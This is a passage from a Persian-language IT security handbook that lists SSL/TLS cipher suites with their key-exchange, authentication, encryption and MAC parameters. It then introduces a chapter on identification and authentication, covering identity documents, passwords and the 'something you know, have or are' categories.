‫ﺗﻮﺍﻓﻖ ﺧﻮﺍﻫﻨﺪ ﺭﺳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺮﻭﺗﻜﻞ ‪ SSL/TLS‬ﺍﺯ ﺍﻳﻦ ﺗﺮﻛﻴﺒﺎﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪:‬‬

‫‪EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH‬‬ ‫‪Au=RSA Enc=3DES(168) Mac=SHA1‬‬


‫‪EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH‬‬ ‫‪Au=DSS Enc=3DES(168) Mac=SHA1‬‬
‫‪DES-CBC3-SHA‬‬ ‫‪SSLv3 Kx=RSA‬‬ ‫‪Au=RSA Enc=3DES(168) Mac=SHA1‬‬

‫‪123 W. Curtis Preston‬‬


‫‪124 Unix Backup And Recovery‬‬
‫‪125 Hash Message Authentication Code‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٣١٢

DHE-DSS-RC4-SHA SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1


RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1
export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export
EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
‫ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬،(‫ ﺑﺎﺷـﺪ‬RSA ‫ ﻳـﺎ‬Diffi-Hellman ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Kx) ‫ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺟﻬﺖ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ‬،‫ﺐ ﺍﻟﮕﻮﺭﻳﺘﻢ‬‫ﻫﺮ ﺗﺮﻛﻴ ﹺ‬
‫ ﻭ ﻛـﺪﻫﺎﻱ‬،(‫ ﺑﺎ ﻃﻮﻝ ﻛﻠﻴـﺪ ﻣﻌـﻴﻦ ﺑﺎﺷـﺪ‬RC2 ‫ ﻳﺎ‬،RC4 ،‫ ﺳﻪﮔﺎﻧﻪ‬DES ،DES ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Enc) ‫ ﺭﻣﺰﮔﺬﺍﺭﻱ‬،(‫ ﺑﺎﺷﺪ‬DSS ‫ ﻳﺎ‬RSA ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Au)
.‫ ﺑﺎﺷﺪ( ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‬MD5 ‫ ﻳﺎ‬SHA1 ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Mac) ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﻴﺎﻡ‬
‫‪٣١٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﭘﻨﺠﻢ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﺎ ﻳﻚ ﻣﻮﺿﻮﻉ ﺍﺳﺖ‪ .‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﻫﻮﻳﺖ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣـﻲﺭﺳـﺎﻧﺪ؛ ﻭ ﺗـﺼﺪﻳﻖ ﺍﺧﺘﻴـﺎﺭ‪،‬‬
‫ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﺣﻘﻮﻕ ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺑﺎ ﻳﻚ ﻫﻮﻳﺖ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﺩﻭ ﻣﻔﻬﻮﻡ ﺑﺎﻻ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﻓﺮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ ،‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺷـﺒﻜﻪ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻮﻳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺮﻛﺰﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﻭ ﺗﻮﺳـﻂ ﮔﺮﻭﻫﻬـﺎﻱ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺑﺮ ﺍﺳﺎﺱ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ‪ ،‬ﻭ ﺑﻘﻴـﻪ‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﺨﺼﺎﺕ ﻣﻤﻴﺰﺓ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺴﻨﺠﻨﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‬
‫ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻫﻴﭽﻴﻚ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺘﻨﺪ ﻛﻪ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺒﺎﻩ ﺍﻧﺪﺍﺧﺖ ﻭ ﺍﺯ ﺳﺪﺷﺎﻥ ﻋﺒﻮﺭ ﻛـﺮﺩ؛ ﻭ ﺍﻟﺒﺘـﻪ ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ‬
‫ﺍﻛﺜﺮ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺍﻳﻨﮕﻮﻧﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻫﺪﻑ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻏﻴﺮﻣﻤﻜﻦ ﻛﺮﺩﻥ ﺟﻌﻞ ﻫﻮﻳﺖ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ‬
‫ﺟﻌﻞ ﻫﻮﻳﺖ ﻭ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻪ ﻳﻚ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺳﺖ‪ .‬ﻳﻚ ﻫﺪﻑ ﻣﻬﻢ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻌﻴﻴﻦ ﻛﻤـﻲ ﻣﻘـﺪﺍﺭ‬
‫ﻣﺨﺎﻃﺮﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺍﺳﺘﻘﺮﺍﺭ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩ ﺍﺳﺖ؛ ﭼﺮﺍﮐﻪ ﺗﻌﻴﻴﻦ ﻛﻤﻲ ﻣﻘﺪﺍﺭ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻗﻴﻤﺎﻧـﺪﻩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﻧﻴﺎﺯ ﻳﺎ ﺗﻤﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺟﺎﻳﮕﺰﻳﻦ‪ ،‬ﻭ ﺣﺘﻲ ﻣﻴﺰﺍﻥ ﭘﻮﺷـﺶ ﻻﺯﻡ ﺑﻴﻤـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﻴﺰﻳﻜﻲ‬
‫ﺑﻪ ﻳﻚ ﻓﺮﻭﺩﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﺮﻭﺍﺯ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺍﻋﺘﺒﺎﺭﻱ ﻳﻚ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﺔ ﻣﺎﺷﻴﻦ ﺑﻜﺸﻴﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ‬
‫ﺑﺎ ﻳﻚ ﻣﺎﺷﻴﻦ ﻛﻪ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﺑﻴﺴﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺭﺯﺵ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﻣﻘﺼﺪ ﺧﻮﺩ ﺭﺍﻧﻨﺪﮔﻲ ﻛﻨﻴـﺪ‪ .‬ﺗﻨﻬـﺎ ﺗـﻀﻤﻴﻨﻲ ﻛـﻪ ﺁﮊﺍﻧـﺲ ﻛﺮﺍﻳـﻪ‬
‫ﻣﺎﺷﻴﻦ ﺍﺯ ﺷﻤﺎ ﺩﺍﺭﺩ ﻛﻪ ﺍﺗﻮﻣﺒﻴﻞ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﺗﻌﻬﺪ ﺷﻤﺎﺳﺖ ‪ -‬ﻭ ﺍﻃﻼﻉ ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺍﮔﺮ ﺧﻠﻒ ﻭﻋﺪﻩ ﻛﻨﻴـﺪ‪ ،‬ﺁﻧﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻻ ﺑﻪ ﺯﻧﺪﺍﻥ ﺧﻮﺍﻫﻴﺪ ﺍﻓﺘﺎﺩ‪.‬‬
‫ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻨﺪ ﻭ ﺷﻤﺎ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺍﮔﺮ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺷﻤﺎ ﺭﺍ ﻧﻤﻲﺷﻨﺎﺧﺖ‪ ،‬ﺗﻌﻬﺪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺁﻥ ﻣﻔﻬﻮﻡ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺖ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﺭﺍﻧﻨﺪﮔﻲ‪ ،‬ﮔﺬﺭﻧﺎﻣﻪ ﻭ ﻳﺎ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ‬
‫ﺷﻤﺎ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳـﺎ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ‬
‫ﺩﺯﺩﻱ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪ ،‬ﻭ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻭ ﺷﺮﻛﺖ ﺑﻴﻤﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺍﺯ ﺍﻋﺘﻤﺎﺩﻱ ﮐﻪ ﺑﻪ ﺷﻤﺎ ﮐﺮﺩﻩ ﺁﮔﺎﻩ ﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﻃﺮﺍﺣﻲ ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﭼﺎﭘﻲ‪ ،‬ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻓﻴﺰﻳﻜﻲ ﺁﻧﻬﺎ ﻣﻼﻙ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻳﻚ ﮔﺬﺭﻧﺎﻣﻪ ﺑﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻳـﻚ ﻣـﺪﺭﻙ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺏ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻗﺎﺑﻞ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ )ﺟﻨﺲ‪ ،‬ﻗﺪ‪ ،‬ﻭﺯﻥ‪ ،‬ﻋﻜﺲ‪ ،‬ﺍﻣـﻀﺎ(‪ ،‬ﺟﻌـﻞ ﺁﻥ ﻣـﺸﻜﻞ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣١٤‬‬

‫ﺍﺳﺖ‪ ،‬ﺑﺮﺍﺣﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ‪ ،‬ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ‪ ،‬ﻭ ﻣﺸﻬﻮﺭ ﺻﺎﺩﺭ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﻗﺒـﻞ ﺍﺯ‬
‫ﺻﺪﻭ ﹺﺭ ﻣﺪﺭﻙ‪ ،‬ﻫﻮﻳﺖ ﻓﺮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﻋﻜﺲ‪ ،‬ﻛﺎﺭﺕ ﻋﻀﻮﻳﺖ ﺩﺭ ﻳﻚ ﺑﺎﺷﮕﺎﻩ ﺭﻭﺯﻧﺎﻣﻪﻧﮕـﺎﺭﻱ ﻭﺍﺟـﺪ ﻫﻴﭽﻴـﻚ ﺍﺯ ﺍﻳـﻦ ﺻـﻔﺎﺕ‬
‫ﻧﻴﺴﺖ‪.‬‬

‫ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ‬


‫ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﭘﻨﺠﺎﻩ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺨﺸﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﺴﻴﺎﺭ ﺑـﺰﺭﮒ ﻫـﺴﺘﻨﺪ‪ .‬ﺣﺘـﻲ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻫﻢ ﻛﻪ ﺩﺭ ﺩﻭ ﺩﻫﺔ ﺍﻭﻝ ﻭﺟﻮﺩ ﺧﻮﺩ ﻓﺎﻗﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺩﻩﺍﻧﺪ‪ ،‬ﺍﻛﻨﻮﻥ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﺩﺳﺘﺮﺳﻴﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ‪ .‬ﻳﻚ ﺗﻔﺎﻭﺕ ﻛﻠﻴﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺪﺍﺭﻙ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﺗﻔﻜﻴﻚ ﻣﻲﻛﻨﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﺍﻛﺜـﺮ‬
‫ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺑﺎﻳﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﻧﺪ ﭼﺎﭖ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺗﻨﻬـﺎ‬
‫ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺍﺛﺒﺎﺕ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺨﺼﻲ ﻛﻪ ﺟﻠﻮﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﺸﺴﺘﻪ ﻛﺎﺭﺑﺮ ﻣﺠـﺎﺯ ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺧـﺎﺹ ﺍﺳـﺖ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺳﻨﺘﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺪﺍﺭﻙ ﺑﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻗﻄﻌﻲ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﻪ ﻛـﺎﺭﺑﺮ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺑـﺎ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﻧﺴﺒﻲ ﻳﺎ ﺍﺣﺮﺍﺯ ﺗﺪﺍﻭﻡ ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺷﻨﺎﺳﺎﻳﻲ ﻗﻄﻌﻲ ﺑﺮﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻤﻞ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﻣـﺸﻜﻞ ﺍﺳـﺖ‪.‬‬
‫ﻻ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ‬‫ﺩﺭﻋﻮﺽ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺴﺒﻲ ﺯﻳﺎﺩﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪ .‬ﺍﻓﺮﺍﺩ ﺑﺎﺗﺠﺮﺑﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ "ﭼﻴﺰﻱ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ"‪" ،‬ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ"‪ ،‬ﻭ ﻳﺎ "ﺁﻧﭽﻪ ﻛﻪ ﻫﺴﺘﻴﺪ" ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺨـﺸﻬﺎﻱ ﺑﻌـﺪﻱ ﺍﻳـﻦ‬
‫ﺳﻪ ﺭﻭﺵ ﺳﻨﺘﻲ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺩﺭ ﻛﻨﺎﺭ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪﺗﺮ‪" :‬ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻳﺪ"‪.‬‬

‫ﺳﻴﺴﺘﻢﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ‪ :‬ﭼﻴﺰﻱ ﻛﻪ ﻣﻲﺩﺍﻧﻴﺪ‬


‫ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻫﻢ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻫﺮ ﻛﺎﺭﺑﺮ ﺳﻴﺴﺘﻢ ﻳﻚ ﺷﻨﺎﺳـﺔ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؛ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺧﻮﺩ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺗﺎﻳﭗ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﺎﻳﭗﺷﺪﻩ ﺑـﺎ‬
